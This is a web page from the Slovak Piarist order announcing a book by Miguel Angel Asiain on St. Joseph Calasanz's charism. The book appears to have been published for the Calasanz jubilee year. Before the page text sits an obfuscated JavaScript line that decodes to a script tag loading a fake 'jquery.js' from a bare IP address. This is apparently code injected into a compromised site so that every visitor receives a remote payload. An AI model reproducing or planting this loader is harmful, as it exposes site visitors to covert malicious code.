var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0])) Rehoľná skúsenosť Kalazanského | Rehoľa piaristov na Slovensku
Zverejnené: 09 mar 2017
Kategória: Piaristi

Vydali sme knihu Rehoľná skúsenosť Kalazanského, aby sme v rámci Kalazanského jubilejného roka ešte lepšie spoznali charizmu sv. Jozefa Kalazanského. Kniha odpovedá na otázku – Ako aplikovať Kalazanského charizmu v dnešnom svete? Je starostlivosť o chudobné deti potrebná aj dnes? Autorom knihy je páter Miguel Angel Asiain , ktorý analyzuje kontext, v ktorom vznikala charizma Kalazanského.

Rehoľná skúsenosť Kalazanského je kniha, v ktorej je hlboko obsiahnutý spôsob, akým rozmýšľal zakladateľ Rehole piaristov – sv. Jozefa Kalazanský. História vo svojom dlhom priebehu štyroch storočí vymazala mnohé aspekty svätcových myšlienok, s ktorými rehoľu zakladal. Kniha však nie je len zbierkou, zachytávajúcou myslenie Kalazanského. Snaží sa porozumieť dobe a spôsobu formovania názorov, v ktorej zakladateľ žil, a ktoré dnes už nemusia byť aktuálne. Preto bolo potrebné položiť si otázku: „Ktoré zo zakladateľových myšlienok sú aktuálne aj dnes? Ktoré v súčastnosti definujú a situujú kalazanský typ rehoľného života“ Rehoľná skúsenosť Kalazanského odpovedá práve na tieto otázky a veľmi prakticky ukazuje, ako má piarista v škole Kalazanského prežívať nasledovanie Pána Ježiša a bezhraničné darovanie sa ľuďom.
 

 

Vieme, že mnoho našich spolupracovníkov, pedagógov, zamestnancov a priateľov túži lepšie spoznať charizmu sv. Jozefa Kalazanského a jeho spôsob myslenia.

Práve preto sme publikovali väčšie množstvo kníh. V prípade záujmu nás kontaktujte na provincia@piaristi.sk

Komentáre

comments